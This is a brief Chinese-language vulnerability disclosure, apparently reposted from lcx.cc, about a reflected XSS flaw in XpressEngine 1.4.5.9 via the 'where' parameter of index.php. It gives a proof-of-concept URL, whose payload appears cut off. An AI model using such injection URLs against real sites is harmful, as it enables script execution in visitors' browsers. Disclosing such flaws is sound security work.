XpressEngine 1.4.5.9
/*菲哥哥
* 2011.8.19
*/XSS
漏洞原因:
index.php 中 where 参数 可以执行 javascript
漏洞URL:
index.php?mid=welcome_page&act=IS&search_target=title_content&[email protected]&where=1>">
文章来源于lcx.cc:XpressEngine 1.4.5.9 XSS - 脚本漏洞
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论